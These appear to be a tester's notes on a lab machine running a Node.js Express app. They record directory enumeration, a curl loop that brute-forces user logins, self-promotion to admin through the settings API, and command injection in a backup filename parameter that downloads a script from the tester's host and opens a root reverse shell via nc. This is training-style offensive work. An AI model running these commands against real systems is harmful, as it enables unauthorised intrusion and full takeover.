2 :80

http://192.168.71.106/
Login Page | node.js express framework
| contains top Users

# tried admin:admin
| popup -> Authentication Error, Login Failed

$ gobuster dir -u http://192.168.71.106 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x js,html,txt -t 90
===============================================================
/main.js              (Status: 200) [Size: 47602]
/index.html           (Status: 200) [Size: 703]
/vendor.js            (Status: 200) [Size: 3515713]
/styles.js            (Status: 200) [Size: 171811]
/runtime.js           (Status: 200) [Size: 6299]

# clear cache, capture in Burp 
# requests to /api/users, /api/settings

$ curl http://192.168.71.106/api/users > users.json
# cleaning
| remove ','
| replace "" with new line
$ cat users.json| sed 's/,//g' | sed 's/""/\n/g' > users
# fix first and last line to remove '[' and ']'

# trying to brute force with users:'password'
$ while read line; do curl -s -X POST -H 'Content-Type: application/json' --data-binary "{\"username\":\"$line\",\"password\":\"password\"}" http://192.168.71.106/login | grep -v Unauthorized && echo $line; done < users
OK
dev-acct

# got creds dev-acct:password
# logging in 
# response
HTTP/1.1 200 OK
X-Powered-By: Express
Content-Type: text/plain; charset=utf-8
Content-Length: 2
ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
Set-Cookie: connect.sid=s%3Ak2KqzG6W0nOILbKK7spk6lK-1gyqL50-.2nn2tYlXXHp%2FVzl1puzVIRPQy1rGs%2BQwCJcRcL4Mm5E; Path=/; HttpOnly
Date: Fri, 08 Oct 2021 20:24:31 GMT
Connection: close

OK

# burp made a new request
GET /api/settings HTTP/1.1
Host: 192.168.71.106
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Referer: http://192.168.71.106/
Cookie: connect.sid=s%3Ak2KqzG6W0nOILbKK7spk6lK-1gyqL50-.2nn2tYlXXHp%2FVzl1puzVIRPQy1rGs%2BQwCJcRcL4Mm5E
# response
HTTP/1.1 200 OK
X-Powered-By: Express
Content-Type: application/json; charset=utf-8
Content-Length: 49
ETag: W/"31-EAIySo5UXJkhTs42wlD84mCNbPQ"
Date: Fri, 08 Oct 2021 20:24:32 GMT
Connection: close

{"color-theme":"light","lang":"en","admin":false}

# changing to Dark Theme from web sends the request
POST /api/settings HTTP/1.1
Host: 192.168.71.106
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 22
Origin: http://192.168.71.106
DNT: 1
Connection: close
Referer: http://192.168.71.106/
Cookie: connect.sid=s%3Ak2KqzG6W0nOILbKK7spk6lK-1gyqL50-.2nn2tYlXXHp%2FVzl1puzVIRPQy1rGs%2BQwCJcRcL4Mm5E

{"color-theme":"dark"

# maybe we can set admin:true
POST /api/settings HTTP/1.1
Host: 192.168.71.106
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 16
Origin: http://192.168.71.106
DNT: 1
Connection: close
Referer: http://192.168.71.106/
Cookie: connect.sid=s%3Ak2KqzG6W0nOILbKK7spk6lK-1gyqL50-.2nn2tYlXXHp%2FVzl1puzVIRPQy1rGs%2BQwCJcRcL4Mm5E

{"admin":"true"}
# response
HTTP/1.1 200 OK
X-Powered-By: Express
Content-Type: text/plain; charset=utf-8
Content-Length: 2
ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
Date: Fri, 08 Oct 2021 20:26:55 GMT
Connection: close

OK

# refreshing the page shows as BackupLogs submit button
# creates a log file in /var/log/app/logfile-<USER-ENTERED>.gz

Can create backup files, but don't understnad how to download it
| looking at f12 > Debugger > Webpack > src > app > log-bakcup > blog-backup.componenet.ts

let result = await this.http.get(`/api/backup?filename=${f.value.filename}`,

# call is being made to /api/backup?filename=<>
# tried searching for where the file is uploaded, cant find it

# trying commnad injection

GET /api/backup?filename=; wget 192.168.49.71/kashz.sh -O /tmp/kashz; HTTP/1.1
GET /api/backup?filename=chmod +x /tmp/kashz; HTTP/1.1
GET /api/backup?filename=;bash /tmp/kashz; HTTP/1.1

$ nc -lvnp 6969                                                                                                  1 ⨯
listening on [any] 6969 ...
connect to [192.168.49.71] from (UNKNOWN) [192.168.71.106] 58418
bash: cannot set terminal process group (422): Inappropriate ioctl for device
bash: no job control in this shell

root@interface:/var/www/app/dist# whoami;id;hostname
whoami;id;hostname
root
uid=0(root) gid=0(root) groups=0(root)
interface

root@interface:/var/www# cat /etc/passwd | grep sh
cat /etc/passwd | grep sh
root:x:0:0:root:/root:/bin/bash
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
justin:x:1000:1000:justin,,,:/home/justin:/bin/bash

Last updated